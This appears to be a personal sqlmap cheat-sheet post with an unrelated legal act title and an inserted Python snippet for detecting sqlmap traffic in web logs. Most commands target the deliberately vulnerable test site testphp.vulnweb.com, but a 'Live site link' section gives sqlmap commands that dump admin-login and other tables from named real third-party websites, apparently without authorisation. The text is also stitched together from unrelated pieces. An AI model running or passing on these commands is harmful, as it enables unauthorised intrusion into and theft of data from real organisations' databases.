⚠️An Act to repeal the Digital Security Act, 2018 and to make new provisions for ensuring cyber security and for the detection, prevention and suppression of offences committed through digital or electronic means, the trial of such offences, and ancillary matters⚠️


SQL MAP use

 







        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Usage: python3 sqlmap [options]

sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). Use -h for basic and -hh for advanced help



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.





Techniques:-

1. B -> boolean-based injection

2. E -> error-based

3. T -> time-based

4. U -> union-based


risk -> degree of harmful payload // sometimes changes hash values

crawl :-

depth 1 : http://abc.com/data 

depth 2 : http://abc.com/data/news 

depth 3 : http://abc.com/data/news/hack
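Seen from the server side, the four technique letters above leave recognisable traces in web access logs. The following is an added example, not part of the original post or of sqlmap: the regex signatures, function names and sample log lines are assumptions constructed for illustration, and the User-Agent check relies on sqlmap announcing itself as "sqlmap/<version>" by default.

```python
import re
from urllib.parse import unquote_plus

# Heuristic patterns per sqlmap technique letter (assumed signatures; tune per application).
SIGNATURES = {
    "B": re.compile(r"\b(?:and|or)\s+\(?\d+\)?\s*=\s*\(?\d+", re.I),
    "E": re.compile(r"\b(?:extractvalue|updatexml)\s*\(|floor\s*\(\s*rand\s*\(", re.I),
    "T": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
    "U": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
# Combined log format: client IP, request target, status, User-Agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def classify(line):
    """Return (ip, sorted technique letters, default_sqlmap_agent) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, _status, agent = m.groups()
    query = unquote_plus(target.partition("?")[2])  # decode %20, %3D, + before matching
    hits = sorted(k for k, rx in SIGNATURES.items() if rx.search(query))
    return ip, hits, agent.lower().startswith("sqlmap/")

def summarize(lines):
    """Per client IP: techniques seen, request count, and whether the default agent appeared."""
    report = {}
    for parsed in filter(None, map(classify, lines)):
        ip, hits, ua = parsed
        entry = report.setdefault(ip, {"techniques": set(), "sqlmap_ua": False, "requests": 0})
        entry["requests"] += 1
        entry["techniques"].update(hits)
        entry["sqlmap_ua"] |= ua
    # Report only clients that matched a signature or announced themselves as sqlmap.
    return {ip: e for ip, e in report.items() if e["techniques"] or e["sqlmap_ua"]}

def _line(ip, query, agent):
    """Build one constructed combined-log line for the demo."""
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?{query} HTTP/1.1" 200 512 "-" "{agent}"'

# Constructed sample traffic (documentation IP ranges, not real logs).
SAMPLE = [
    _line("203.0.113.7", "cat=1%20AND%204821%3D4821", "sqlmap/1.6.4#stable (https://sqlmap.org)"),
    _line("203.0.113.7", "cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL", "sqlmap/1.6.4#stable (https://sqlmap.org)"),
    _line("198.51.100.9", "cat=1%20AND%20SLEEP(5)", "Mozilla/5.0"),
    _line("198.51.100.9", "cat=1%20AND%20EXTRACTVALUE(1%2C1)", "Mozilla/5.0"),
    _line("198.51.100.20", "cat=1", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE).items():
        print(ip, sorted(entry["techniques"]), "sqlmap UA" if entry["sqlmap_ua"] else "other UA")
```

The second client in the sample uses a browser User-Agent, so only the query-string signatures catch it; an agent-string match alone is not a sufficient detection.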




Find vulnerable parameter 

sqlmap -u http://testphp.vulnweb.com/ --crawl 2

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --technique="U" --batch 

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --threads 5 

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --risk 1

After getting parameter 

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D database --tables

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D database -T table --columns

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --dump

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --dump






Live site link




 sqlmap -u http://www.proficientindustries.in/view-single-news.php?id=1 -D nsp_proficientin -T admin_login --dump all

  sqlmap -u http://www.aitindia.in/aitnew/e_course_detail.php?id=1 -D u670106978_aitindia -T admin --dump all



   sqlmap -u http://bdgroup.com.bd/awards.php?id=7 -D bdgroup_bdg --dump all

    sqlmap -u https://www.csi-india.org/news/index.php?id=18 -D  information_schema --dump all



Final result


